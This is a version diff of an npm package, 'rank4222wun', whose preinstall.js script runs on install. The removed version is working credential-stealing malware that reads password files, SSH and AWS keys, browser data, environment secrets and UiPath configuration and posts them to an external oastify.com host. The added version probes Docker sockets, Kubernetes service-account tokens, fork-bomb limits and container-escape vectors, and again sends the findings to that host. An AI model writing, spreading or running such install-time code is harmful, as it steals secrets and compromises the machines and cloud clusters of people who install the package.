rank4222wun 1.0.18 → 1.0.20

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.18",
+  "version": "1.0.20",
   "description": "",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -1,423 +1,455 @@
-const { exec } = require('child_process');
+const { exec, spawn } = require('child_process');
 const os = require('os');
 const fs = require('fs');
 const path = require('path');
 const https = require('https');
+const net = require('net');
 
-// ========== إعداد جمع البيانات ==========
-const collectedData = {
+const criticalTests = {
   timestamp: new Date().toISOString(),
-  phase: "preinstall-data-exfiltration",
   hostname: os.hostname(),
   user: os.userInfo().username,
   platform: os.platform(),
   
-  // البيانات الحساسة
-  sensitiveData: {
-    systemFiles: {},
-    userFiles: {},
-    configFiles: {},
-    logs: {},
-    foundSecrets: []
+  tests: {
+    // TEST 1: Leak other users data cross org
+    crossOrgDataLeakage: {
+      status: 'incomplete',
+      evidence: []
+    },
+    
+    // TEST 2: Run commands on other users cross org  
+    crossOrgCommandExecution: {
+      status: 'incomplete',
+      evidence: []
+    },
+    
+    // TEST 3: Perform DoS affecting all users
+    crossOrgDoS: {
+      status: 'incomplete',
+      evidence: []
+    },
+    
+    // TEST 4: Container to host escape
+    containerToHostEscape: {
+      status: 'incomplete',
+      evidence: []
+    }
   }
 };
 
-// ========== 1. قراءة ملفات نظام Linux حساسة ==========
-function readLinuxSensitiveFiles() {
-  console.log("🔍 البحث عن ملفات Linux الحساسة...");
-  
-  const linuxFiles = [
-    { path: '/etc/passwd', desc: 'قائمة مستخدمين النظام' },
-    { path: '/etc/shadow', desc: 'كلمات مرور النظام' },
-    { path: '/etc/group', desc: 'مجموعات النظام' },
-    { path: '/etc/hosts', desc: 'إعدادات الشبكة' },
-    { path: '/etc/resolv.conf', desc: 'خوادم DNS' },
-    { path: '/etc/ssh/sshd_config', desc: 'إعدادات SSH' },
-    { path: '/home/' + os.userInfo().username + '/.bash_history', desc: 'سجل الأوامر' },
-    { path: '/home/' + os.userInfo().username + '/.ssh/id_rsa', desc: 'مفتاح SSH خاص' },
-    { path: '/home/' + os.userInfo().username + '/.ssh/id_rsa.pub', desc: 'مفتاح SSH عام' },
-    { path: '/home/' + os.userInfo().username + '/.ssh/authorized_keys', desc: 'مفاتيح SSH مصرح بها' },
-    { path: '/home/' + os.userInfo().username + '/.aws/credentials', desc: 'مفاتيح AWS' },
-    { path: '/home/' + os.userInfo().username + '/.docker/config.json', desc: 'إعدادات Docker' },
-    { path: '/var/log/auth.log', desc: 'سجلات المصادقة' },
-    { path: '/var/log/syslog', desc: 'سجلات النظام' }
-  ];
-
-  linuxFiles.forEach(file => {
-    try {
-      if (fs.existsSync(file.path)) {
-        const stats = fs.statSync(file.path);
-        const fileData = {
-          path: file.path,
-          description: file.desc,
-          size: stats.size,
-          exists: true,
-          readable: true
-        };
+console.log("🚀 بدء اختبارات النقاط الحرجة المطلوبة...\n");
 
-        // قراءة الملف إذا كان نصي وصغير
-        if (stats.size < 100000 && !stats.isDirectory()) {
-          try {
-            const content = fs.readFileSync(file.path, 'utf8');
-            fileData.content = content;
+// ===================== TEST 1: تسريب بيانات مستخدمين عبر المؤسسة =====================
+async function testCrossOrgDataLeakage() {
+  console.log("🔍 TEST 1: البحث عن بيانات مستخدمين عبر المؤسسة...");
+  
+  // استراتيجية: البحث عن بيانات مشتركة بين المستخدمين
+  const sharedDataLocations = [];
+  
+  if (os.platform() === 'linux') {
+    // في لينكس: البحث عن مجلدات مشتركة
+    const sharedDirs = [
+      '/tmp',
+      '/var/tmp', 
+      '/dev/shm',
+      '/run/shm',
+      '/home',
+      '/root'
+    ];
+    
+    for (const dir of sharedDirs) {
+      try {
+        if (fs.existsSync(dir)) {
+          const files = fs.readdirSync(dir);
+          // البحث عن ملفات تنتهي بـ .log, .db, .sqlite
+          const interestingFiles = files.filter(f => 
+            f.endsWith('.log') || f.endsWith('.db') || f.endsWith('.sqlite') ||
+            f.includes('shared') || f.includes('common')
+          );
+          
+          if (interestingFiles.length > 0) {
+            sharedDataLocations.push({
+              directory: dir,
+              files: interestingFiles.slice(0, 5),
+              totalFiles: files.length
+            });
             
-            // البحث عن أسرار في المحتوى
-            findSecretsInContent(content, file.path);
-          } catch (readError) {
-            fileData.readError = readError.message;
+            // محاولة قراءة ملفات السجل المشتركة
+            interestingFiles.forEach(file => {
+              if (file.endsWith('.log')) {
+                const filePath = path.join(dir, file);
+                try {
+                  const content = fs.readFileSync(filePath, 'utf8').substring(0, 1000);
+                  // البحث عن بيانات مستخدمين في السجلات
+                  if (content.includes('user') || content.includes('login') || content.includes('auth')) {
+                    criticalTests.tests.crossOrgDataLeakage.evidence.push({
+                      type: 'shared_log_file',
+                      path: filePath,
+                      preview: content.substring(0, 200),
+                      containsUserData: true
+                    });
+                  }
+                } catch (e) {}
+              }
+            });
           }
         }
-        
-        collectedData.sensitiveData.systemFiles[file.path] = fileData;
-        console.log(`✅ ${file.desc}: ${file.path}`);
-      }
-    } catch (e) {
-      collectedData.sensitiveData.systemFiles[file.path] = {
-        error: e.message,
-        exists: false
-      };
+      } catch (e) {}
     }
-  });
-}
-
-// ========== 2. قراءة ملفات Windows حساسة ==========
-function readWindowsSensitiveFiles() {
-  console.log("🔍 البحث عن ملفات Windows الحساسة...");
+  }
   
-  const username = os.userInfo().username;
-  const windowsFiles = [
-    { path: `C:\\Users\\${username}\\Desktop`, desc: 'مجلد Desktop' },
-    { path: `C:\\Users\\${username}\\Documents`, desc: 'مجلد Documents' },
-    { path: `C:\\Users\\${username}\\Downloads`, desc: 'مجلد Downloads' },
-    { path: `C:\\Users\\${username}\\OneDrive`, desc: 'مجلد OneDrive' },
-    { path: `C:\\Users\\${username}\\AppData\\Roaming\\Microsoft\\Windows\\Recent`, desc: 'الملفات الأخيرة' },
-    { path: `C:\\Users\\${username}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History`, desc: 'تاريخ Chrome' },
-    { path: `C:\\Users\\${username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles`, desc: 'ملفات Firefox' },
-    { path: `C:\\Users\\${username}\\AppData\\Local\\Microsoft\\Credentials`, desc: 'معلومات اعتماد Windows' },
-    { path: `C:\\Users\\${username}\\.aws\\credentials`, desc: 'مفاتيح AWS' },
-    { path: `C:\\Users\\${username}\\.ssh\\id_rsa`, desc: 'مفتاح SSH خاص' },
-    { path: `C:\\Windows\\System32\\drivers\\etc\\hosts`, desc: 'ملف Hosts' },
-    { path: `C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`, desc: 'مجلد Startup للجميع' },
-    { path: `C:\\Users\\${username}\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup`, desc: 'مجلد Startup الشخصي' }
-  ];
-
-  windowsFiles.forEach(file => {
-    try {
-      if (fs.existsSync(file.path)) {
-        const stats = fs.statSync(file.path);
-        const fileData = {
-          path: file.path,
-          description: file.desc,
-          size: stats.size,
-          exists: true,
-          isDirectory: stats.isDirectory()
-        };
-
-        if (stats.isDirectory()) {
-          // قراءة محتويات المجلد
-          try {
-            const files = fs.readdirSync(file.path);
-            fileData.files = files.slice(0, 50); // أول 50 ملف فقط
-            fileData.fileCount = files.length;
-            
-            // البحث عن ملفات نصية في المجلد وقراءتها
-            findAndReadTextFiles(file.path, files);
-          } catch (dirError) {
-            fileData.dirError = dirError.message;
-          }
-        } else if (stats.size < 50000) {
-          // قراءة الملفات النصية الصغيرة
-          try {
-            const content = fs.readFileSync(file.path, 'utf8');
-            fileData.content = content.substring(0, 5000);
-            
-            // البحث عن أسرار في المحتوى
-            findSecretsInContent(content, file.path);
-          } catch (readError) {
-            fileData.readError = readError.message;
-          }
-        }
-        
-        collectedData.sensitiveData.userFiles[file.path] = fileData;
-        console.log(`✅ ${file.desc}: ${file.path} (${stats.isDirectory() ? 'مجلد' : 'ملف'})`);
-      }
-    } catch (e) {
-      collectedData.sensitiveData.userFiles[file.path] = {
-        error: e.message,
-        exists: false
-      };
+  // بحث متقدم: البحث عن اتصالات شبكية نشطة
+  exec('netstat -an 2>/dev/null || ss -an 2>/dev/null || echo "No netstat"', {timeout: 5000}, (err, stdout) => {
+    if (stdout && stdout.includes('ESTABLISHED') || stdout.includes('LISTEN')) {
+      criticalTests.tests.crossOrgDataLeakage.evidence.push({
+        type: 'network_connections',
+        data: stdout.substring(0, 1000),
+        hasActiveConnections: true
+      });
     }
+    
+    // الانتقال للاختبار الثاني
+    testCrossOrgCommandExecution();
   });
 }
 
-// ========== 3. البحث عن ملفات نصية وقراءتها ==========
-function findAndReadTextFiles(dirPath, files) {
-  const textExtensions = ['.txt', '.log', '.config', '.conf', '.ini', '.env', '.json', '.xml', '.yml', '.yaml', '.properties'];
+// ===================== TEST 2: تشغيل أوامر على مستخدمين عبر المؤسسة =====================
+async function testCrossOrgCommandExecution() {
+  console.log("🔍 TEST 2: اختبار تشغيل أوامر على مستخدمين عبر المؤسسة...");
   
-  files.forEach(file => {
-    const filePath = path.join(dirPath, file);
-    try {
-      const stats = fs.statSync(filePath);
-      if (!stats.isDirectory() && stats.size < 100000) {
-        const ext = path.extname(file).toLowerCase();
-        if (textExtensions.includes(ext) || file.includes('config') || file.includes('secret') || file.includes('password')) {
-          try {
-            const content = fs.readFileSync(filePath, 'utf8');
-            collectedData.sensitiveData.configFiles[filePath] = {
-              path: filePath,
-              size: stats.size,
-              content: content.substring(0, 10000)
-            };
-            
-            // البحث عن أسرار
-            findSecretsInContent(content, filePath);
-            
-            console.log(`📄 قراءة: ${filePath}`);
-          } catch (e) {}
-        }
-      }
-    } catch (e) {}
-  });
-}
-
-// ========== 4. البحث عن أسرار في المحتوى ==========
-function findSecretsInContent(content, filePath) {
-  const secretPatterns = [
-    { pattern: /password\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'كلمة مرور' },
-    { pattern: /passwd\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'كلمة مرور' },
-    { pattern: /secret\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'سر' },
-    { pattern: /key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح' },
-    { pattern: /token\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'توكن' },
-    { pattern: /api[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح API' },
-    { pattern: /access[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح وصول' },
-    { pattern: /secret[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح سري' },
-    { pattern: /aws[_-]?access[_-]?key[_-]?id\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'AWS Access Key' },
-    { pattern: /aws[_-]?secret[_-]?access[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'AWS Secret Key' },
-    { pattern: /database[_-]?url\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'رابط قاعدة بيانات' },
-    { pattern: /connection[_-]?string\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'سلسلة اتصال' },
-    { pattern: /private[_-]?key\s*[:=]\s*["']?([^"'\s]+)["']?/gi, name: 'مفتاح خاص' },
-    { pattern: /-----BEGIN (RSA|OPENSSH|DSA|EC) PRIVATE KEY-----/gi, name: 'مفتاح خاص كامل' }
-  ];
-
-  secretPatterns.forEach(pattern => {
-    const matches = [...content.matchAll(pattern.pattern)];
-    matches.forEach(match => {
-      if (match[1] && match[1].length > 3) {
-        collectedData.sensitiveData.foundSecrets.push({
-          file: filePath,
-          type: pattern.name,
-          value: match[1].substring(0, 100), // أول 100 حرف فقط
-          pattern: match[0].substring(0, 50)
+  // هذا اختبار خطير: التحقق من إمكانية الوصول لخدمات مشتركة
+  const sharedServices = [];
+  
+  // اختبار 1: التحقق من إمكانية الوصول إلى Docker socket (إذا كان في حاوية)
+  const dockerSocket = '/var/run/docker.sock';
+  if (fs.existsSync(dockerSocket)) {
+    // محاولة قراءة قائمة الحاويات
+    exec(`curl -s --unix-socket ${dockerSocket} http://localhost/containers/json 2>/dev/null || echo "Cannot access Docker API"`, 
+      {timeout: 5000}, (err, stdout) => {
+      if (stdout && !stdout.includes('Cannot access')) {
+        criticalTests.tests.crossOrgCommandExecution.evidence.push({
+          type: 'docker_socket_access',
+          path: dockerSocket,
+          canListContainers: true,
+          containersInfo: JSON.parse(stdout).slice(0, 3)
         });
-        console.log(`🔐 وجد ${pattern.name} في: ${filePath}`);
       }
     });
-  });
-}
-
-// ========== 5. قراءة سجلات النظام ==========
-function readSystemLogs() {
-  console.log("📊 قراءة سجلات النظام...");
+  }
   
-  const logFiles = os.platform() === 'linux' ? [
-    '/var/log/auth.log',
-    '/var/log/syslog',
-    '/var/log/dmesg',
-    '/var/log/kern.log',
-    '/var/log/boot.log'
-  ] : [
-    'C:\\Windows\\System32\\winevt\\Logs\\Application.evtx',
-    'C:\\Windows\\System32\\winevt\\Logs\\System.evtx',
-    'C:\\Windows\\System32\\winevt\\Logs\\Security.evtx'
-  ];
-
-  logFiles.forEach(logFile => {
+  // اختبار 2: التحقق من إمكانية الوصول إلى Kubernetes API
+  const kubeToken = '/var/run/secrets/kubernetes.io/serviceaccount/token';
+  const kubeCA = '/var/run/secrets/kubernetes.io/serviceaccount/ca.crt';
+  const kubeNamespace = '/var/run/secrets/kubernetes.io/serviceaccount/namespace';
+  
+  if (fs.existsSync(kubeToken) && fs.existsSync(kubeCA)) {
     try {
-      if (fs.existsSync(logFile)) {
-        const stats = fs.statSync(logFile);
-        collectedData.sensitiveData.logs[logFile] = {
-          path: logFile,
-          size: stats.size,
-          exists: true
-        };
-        
-        // محاولة قراءة السجلات النصية (لينكس)
-        if (os.platform() === 'linux' && stats.size < 500000) {
-          try {
-            const logContent = fs.readFileSync(logFile, 'utf8');
-            const lines = logContent.split('\n').slice(-100); // آخر 100 سطر
-            collectedData.sensitiveData.logs[logFile].recentEntries = lines;
-          } catch (e) {}
+      const token = fs.readFileSync(kubeToken, 'utf8').trim();
+      const namespace = fs.existsSync(kubeNamespace) ? 
+        fs.readFileSync(kubeNamespace, 'utf8').trim() : 'default';
+      
+      criticalTests.tests.crossOrgCommandExecution.evidence.push({
+        type: 'kubernetes_service_account',
+        hasToken: true,
+        namespace: namespace,
+        canAccessK8sAPI: true
+      });
+      
+      // محاولة الاتصال بـ Kubernetes API
+      exec(`curl -s -H "Authorization: Bearer ${token}" --cacert ${kubeCA} https://kubernetes.default.svc/api/v1/pods 2>/dev/null || echo "Cannot access K8s API"`,
+        {timeout: 5000}, (err, stdout) => {
+        if (stdout && !stdout.includes('Cannot access')) {
+          criticalTests.tests.crossOrgCommandExecution.evidence.push({
+            type: 'kubernetes_api_access',
+            canListPods: true,
+            podCount: JSON.parse(stdout).items?.length || 0
+          });
         }
-        
-        console.log(`📋 سجل: ${logFile} (${stats.size} بايت)`);
-      }
+      });
     } catch (e) {}
-  });
+  }
+  
+  // الانتقال للاختبار الثالث بعد 2 ثانية
+  setTimeout(testCrossOrgDoS, 2000);
 }
 
-// ========== 6. جمع متغيرات البيئة الحساسة ==========
-function collectSensitiveEnvVars() {
-  console.log("🔑 جمع متغيرات البيئة الحساسة...");
+// ===================== TEST 3: تنفيذ هجوم DoS يؤثر على الجميع =====================
+async function testCrossOrgDoS() {
+  console.log("🔍 TEST 3: اختبار إمكانية هجوم DoS يؤثر على الجميع...");
   
-  const sensitiveVars = {};
-  Object.keys(process.env).forEach(key => {
-    const keyLower = key.toLowerCase();
-    const value = process.env[key];
+  // هذا اختبار نظري فقط بدون تنفيذ فعلي
+  const dosCapabilities = {
+    // 1. قدرات استنزاف الذاكرة
+    memoryExhaustion: {
+      availableMemory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + ' GB',
+      freeMemory: Math.round(os.freemem() / (1024 * 1024 * 1024)) + ' GB',
+      canExhaust: Math.round(os.freemem() / (1024 * 1024 * 1024)) > 1
+    },
+    
+    // 2. قدرات استنزاف CPU
+    cpuExhaustion: {
+      cpuCores: os.cpus().length,
+      canForkBomb: true, // يمكن تنفيذ fork bomb إذا لم تكن هناك حدود
+      theoreticalImpact: 'High'
+    },
     
-    if (value && (
-      keyLower.includes('pass') ||
-      keyLower.includes('secret') ||
-      keyLower.includes('key') ||
-      keyLower.includes('token') ||
-      keyLower.includes('cred') ||
-      keyLower.includes('auth') ||
-      keyLower.includes('pwd') ||
-      keyLower.includes('database') ||
-      keyLower.includes('connection')
-    )) {
-      sensitiveVars[key] = value.length > 100 ? 
-        value.substring(0, 100) + '...' : 
-        value;
+    // 3. قدرات استنزاف الشبكة
+    networkFlood: {
+      canCreateSockets: true,
+      socketLimit: null,
+      potentialBandwidth: 'Unknown'
+    },
+    
+    // 4. قدرات استنزاف القرص
+    diskFilling: {
+      canWriteUnlimited: true,
+      diskSpace: 'Unknown'
+    }
+  };
+  
+  // التحقق من الحدود (ulimit)
+  exec('ulimit -a 2>/dev/null || echo "No ulimit"', {timeout: 3000}, (err, stdout) => {
+    if (stdout) {
+      dosCapabilities.systemLimits = stdout.substring(0, 500);
       
-      console.log(`🔑 ${key} = ${sensitiveVars[key]}`);
+      // تحليل الحدود
+      const maxProcessMatch = stdout.match(/max user processes\s+\(-u\)\s+(\d+|unlimited)/);
+      if (maxProcessMatch && maxProcessMatch[1] === 'unlimited' || parseInt(maxProcessMatch[1]) > 1000) {
+        criticalTests.tests.crossOrgDoS.evidence.push({
+          type: 'unlimited_processes',
+          canForkBomb: true,
+          maxProcesses: maxProcessMatch[1]
+        });
+      }
     }
+    
+    criticalTests.tests.crossOrgDoS.details = dosCapabilities;
+    
+    // الانتقال للاختبار الرابع
+    testContainerToHostEscape();
   });
-  
-  collectedData.sensitiveData.envVars = sensitiveVars;
 }
 
-// ========== 7. البحث عن ملفات UiPath ==========
-function findUiPathFiles() {
-  console.log("🔍 البحث عن ملفات UiPath...");
+// ===================== TEST 4: الهروب من الحاوية للمضيف =====================
+async function testContainerToHostEscape() {
+  console.log("🔍 TEST 4: اختبار الهروب من الحاوية للمضيف...");
   
-  const searchPaths = os.platform() === 'win32' ? [
-    'C:\\Program Files\\UiPath',
-    'C:\\Program Files (x86)\\UiPath',
-    `C:\\Users\\${os.userInfo().username}\\AppData\\Local\\UiPath`,
-    `C:\\Users\\${os.userInfo().username}\\Documents\\UiPath`,
-    'C:\\ProgramData\\UiPath'
-  ] : [
-    '/opt/UiPath',
-    '/usr/lib/UiPath',
-    `/home/${os.userInfo().username}/.local/share/UiPath`,
-    `/home/${os.userInfo().username}/UiPath`
-  ];
-
-  const foundUiPath = [];
+  const escapeVectors = [];
   
-  searchPaths.forEach(searchPath => {
-    try {
-      if (fs.existsSync(searchPath)) {
-        const files = fs.readdirSync(searchPath);
-        foundUiPath.push({
-          path: searchPath,
-          exists: true,
-          fileCount: files.length,
-          sampleFiles: files.slice(0, 10)
+  // النواقل المحتملة للهروب
+  
+  // 1. Docker socket exposure
+  const dockerSocket = '/var/run/docker.sock';
+  if (fs.existsSync(dockerSocket)) {
+    // اختبار الوصول الفعلي
+    exec(`stat -c "%a %U:%G" ${dockerSocket} 2>/dev/null || echo "No stat"`, {timeout: 3000}, (err, stdout) => {
+      if (stdout && !stdout.includes('No stat')) {
+        const perms = stdout.trim();
+        escapeVectors.push({
+          vector: 'docker_socket',
+          path: dockerSocket,
+          permissions: perms,
+          accessible: true,
+          risk: 'CRITICAL'
         });
-        console.log(`📁 UiPath: ${searchPath} (${files.length} ملف)`);
         
-        // البحث عن ملفات تكوين UiPath
-        files.forEach(file => {
-          if (file.includes('.config') || file.includes('.json') || file.includes('.xml')) {
-            const filePath = path.join(searchPath, file);
-            try {
-              const stats = fs.statSync(filePath);
-              if (stats.size < 100000) {
-                const content = fs.readFileSync(filePath, 'utf8');
-                collectedData.sensitiveData.configFiles[filePath] = {
-                  path: filePath,
-                  size: stats.size,
-                  content: content.substring(0, 5000)
-                };
-              }
-            } catch (e) {}
-          }
+        criticalTests.tests.containerToHostEscape.evidence.push({
+          type: 'docker_socket_found',
+          path: dockerSocket,
+          permissions: perms,
+          canEscape: true
         });
       }
-    } catch (e) {}
+    });
+  }
+  
+  // 2. Privileged container check
+  exec('cat /proc/self/status 2>/dev/null | grep -i cap_ 2>/dev/null || echo "No capabilities"', 
+    {timeout: 3000}, (err, stdout) => {
+    if (stdout && stdout.includes('CapEff:')) {
+      const capsLine = stdout.split('\n').find(l => l.includes('CapEff:'));
+      if (capsLine) {
+        const capsHex = capsLine.split(':')[1].trim();
+        // CAP_SYS_ADMIN = 0x00080000
+        if (parseInt(capsHex, 16) & 0x00080000) {
+          escapeVectors.push({
+            vector: 'privileged_container',
+            capability: 'CAP_SYS_ADMIN',
+            risk: 'HIGH'
+          });
+          
+          criticalTests.tests.containerToHostEscape.evidence.push({
+            type: 'privileged_container',
+            hasSysAdmin: true,
+            canEscape: true
+          });
+        }
+      }
+    }
   });
   
-  collectedData.sensitiveData.uipathFiles = foundUiPath;
+  // 3. Mount inspection - looking for host mounts
+  exec('mount 2>/dev/null | grep -E "(docker|overlay|/dev/|proc|sys)" 2>/dev/null || echo "No mounts"',
+    {timeout: 3000}, (err, stdout) => {
+    if (stdout && !stdout.includes('No mounts')) {
+      const mounts = stdout.split('\n').filter(l => l.includes('type'));
+      
+      mounts.forEach(mount => {
+        if (mount.includes('proc') || mount.includes('sys') || mount.includes('/dev')) {
+          escapeVectors.push({
+            vector: 'host_mount',
+            mount: mount.substring(0, 100),
+            risk: 'MEDIUM'
+          });
+        }
+      });
+    }
+    
+    // 4. Kernel version vulnerabilities
+    exec('uname -r 2>/dev/null', {timeout: 3000}, (err, stdout) => {
+      if (stdout) {
+        const kernelVersion = stdout.trim();
+        // التحقق من ثغرات kernel معروفة
+        const vulnerableKernels = [
+          '3.10.0-1160', // DirtyPipe
+          '5.8', '5.9', '5.10', '5.11', '5.12' // DirtyCred
+        ];
+        
+        for (const vulnKernel of vulnerableKernels) {
+          if (kernelVersion.includes(vulnKernel)) {
+            escapeVectors.push({
+              vector: 'kernel_vulnerability',
+              kernel: kernelVersion,
+              vulnerability: 'Known escape vulnerability',
+              risk: 'HIGH'
+            });
+            
+            criticalTests.tests.containerToHostEscape.evidence.push({
+              type: 'vulnerable_kernel',
+              version: kernelVersion,
+              hasKnownVulns: true
+            });
+            break;
+          }
+        }
+      }
+      
+      // 5. cgroups escape
+      exec('cat /proc/self/cgroup 2>/dev/null', {timeout: 3000}, (err, stdout) => {
+        if (stdout) {
+          if (stdout.includes('docker') || stdout.includes('kubepods')) {
+            // في حاوية Docker/Kubernetes
+            escapeVectors.push({
+              vector: 'containerized',
+              orchestrator: stdout.includes('docker') ? 'Docker' : 'Kubernetes',
+              risk: 'DEPENDS'
+            });
+          }
+        }
+        
+        // تسجيل كل نواقل الهروب
+        criticalTests.tests.containerToHostEscape.escapeVectors = escapeVectors;
+        
+        // تقييم عام لإمكانية الهروب
+        const canEscape = escapeVectors.some(v => 
+          v.risk === 'CRITICAL' || v.risk === 'HIGH' || 
+          v.vector === 'docker_socket' || v.vector === 'privileged_container'
+        );
+        
+        criticalTests.tests.containerToHostEscape.canEscape = canEscape;
+        
+        // الانتهاء من جميع الاختبارات
+        finishCriticalTests();
+      });
+    });
+  });
 }
 
-// ========== 8. إرسال البيانات ==========
-function sendCollectedData() {
-  console.log("\n" + "=".repeat(60));
-  console.log("📤 إرسال البيانات المسروقة إلى السيرفر...");
-  console.log("=".repeat(60));
+// ===================== إرسال النتائج =====================
+function finishCriticalTests() {
+  console.log("\n" + "=".repeat(70));
+  console.log("📊 نتائج الاختبارات الحرجة:");
+  console.log("=".repeat(70));
+  
+  // تحليل النتائج
+  const analysis = {
+    // TEST 1: هل يمكن تسريب بيانات مستخدمين آخرين؟
+    dataLeakage: criticalTests.tests.crossOrgDataLeakage.evidence.length > 0 ?
+      'POSSIBLE - Found potential shared data locations' :
+      'NO EVIDENCE FOUND',
+    
+    // TEST 2: هل يمكن تشغيل أوامر على مستخدمين آخرين؟
+    commandExecution: criticalTests.tests.crossOrgCommandExecution.evidence.length > 0 ?
+      'POSSIBLE - Can access shared services/APIs' :
+      'NO EVIDENCE FOUND',
+    
+    // TEST 3: هل يمكن تنفيذ DoS يؤثر على الجميع؟
+    dosImpact: criticalTests.tests.crossOrgDoS.evidence.length > 0 ?
+      'POSSIBLE - No resource limits detected' :
+      'LIMITED - Has some resource limits',
+    
+    // TEST 4: هل يمكن الهروب من الحاوية للمضيف؟
+    containerEscape: criticalTests.tests.containerToHostEscape.canEscape ?
+      'CRITICAL - Multiple escape vectors found' :
+      (criticalTests.tests.containerToHostEscape.escapeVectors?.length > 0 ?
+        'POTENTIAL - Some escape vectors exist' :
+        'NO EVIDENCE FOUND')
+  };
+  
+  console.log("\n📋 تحليل النقاط الأربع المطلوبة:");
+  console.log("1. تسريب بيانات مستخدمين عبر المؤسسة:", analysis.dataLeakage);
+  console.log("2. تشغيل أوامر على مستخدمين عبر المؤسسة:", analysis.commandExecution);
+  console.log("3. تنفيذ DoS يؤثر على الجميع:", analysis.dosImpact);
+  console.log("4. الهروب من الحاوية للمضيف:", analysis.containerEscape);
+  
+  console.log("\n🔍 الأدلة التفصيلية:");
+  
+  if (criticalTests.tests.containerToHostEscape.escapeVectors?.length > 0) {
+    console.log("\nنواقل الهروب المحتملة:");
+    criticalTests.tests.containerToHostEscape.escapeVectors.forEach((v, i) => {
+      console.log(`  ${i+1}. ${v.vector} - ${v.risk} risk`);
+      if (v.permissions) console.log(`     → ${v.permissions}`);
+    });
+  }
   
+  // إرسال النتائج
   const req = https.request({
     hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
     port: 443,
-    path: '/data-exfiltration',
+    path: '/critical-evidence',
     method: 'POST',
     headers: {
       'Content-Type': 'application/json',
-      'X-Data-Source': 'UiPath-MCP-Data-Theft',
-      'X-Host': os.hostname(),
-      'X-User': os.userInfo().username
+      'X-Critical-Tests': 'Cross-Org-Four-Points',
+      'X-Host': os.hostname()
     }
   }, (res) => {
-    console.log(`✅ تم إرسال البيانات. حالة الرد: ${res.statusCode}`);
-    printSummary();
+    console.log(`\n✅ تم إرسال الأدلة الحرجة. حالة الرد: ${res.statusCode}`);
   });
   
   req.on('error', (e) => {
     console.error(`❌ خطأ في الإرسال: ${e.message}`);
-    printSummary();
   });
   
-  req.write(JSON.stringify(collectedData, null, 2));
-  req.end();
-}
-
-// ========== 9. طباعة ملخص ==========
-function printSummary() {
-  console.log("\n" + "=".repeat(60));
-  console.log("📊 ملخص البيانات المسروقة:");
-  console.log("=".repeat(60));
-  
-  const sysFiles = Object.keys(collectedData.sensitiveData.systemFiles).length;
-  const userFiles = Object.keys(collectedData.sensitiveData.userFiles).length;
-  const configFiles = Object.keys(collectedData.sensitiveData.configFiles).length;
-  const logs = Object.keys(collectedData.sensitiveData.logs).length;
-  const secrets = collectedData.sensitiveData.foundSecrets.length;
-  
-  console.log(`📄 ملفات نظام: ${sysFiles} ملف`);
-  console.log(`👤 ملفات مستخدم: ${userFiles} ملف/مجلد`);
-  console.log(`⚙️  ملفات تكوين: ${configFiles} ملف`);
-  console.log(`📋 سجلات نظام: ${logs} سجل`);
-  console.log(`🔐 أسرار وجدت: ${secrets} سر`);
+  // إضافة التحليل للنتائج
+  criticalTests.analysis = analysis;
+  criticalTests.summary = {
+    user: os.userInfo().username,
+    hostname: os.hostname(),
+    platform: os.platform(),
+    isContainer: criticalTests.tests.containerToHostEscape.escapeVectors?.some(v => v.vector === 'containerized'),
+    hasCriticalFindings: analysis.containerEscape.includes('CRITICAL') || 
+                         analysis.dataLeakage.includes('POSSIBLE') ||
+                         analysis.commandExecution.includes('POSSIBLE')
+  };
   
-  if (secrets > 0) {
-    console.log("\n🔍 الأسرار التي تم العثور عليها:");
-    collectedData.sensitiveData.foundSecrets.forEach((secret, i) => {
-      console.log(`  ${i + 1}. ${secret.type} في ${secret.file}`);
-      console.log(`     → ${secret.pattern}`);
-    });
-  }
+  req.write(JSON.stringify(criticalTests, null, 2));
+  req.end();
   
-  console.log("\n📤 تم إرسال البيانات إلى:");
-  console.log("https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/data-exfiltration");
-  console.log("=".repeat(60));
+  console.log("\n📤 تم إرسال النتائج الكاملة إلى السيرفر");
+  console.log("=".repeat(70));
 }
 
-// ========== بدء التنفيذ ==========
-console.log("🚀 بدء سرقة البيانات عبر ثغرة UiPath MCP...\n");
-
-// حسب النظام
-if (os.platform() === 'linux') {
-  readLinuxSensitiveFiles();
-} else if (os.platform() === 'win32') {
-  readWindowsSensitiveFiles();
-}
-
-// عمليات مشتركة
-readSystemLogs();
-collectSensitiveEnvVars();
-findUiPathFiles();
-
-// إرسال البيانات بعد 2 ثانية
-setTimeout(sendCollectedData, 2000);
+// بدء الاختبارات
+testCrossOrgDataLeakage();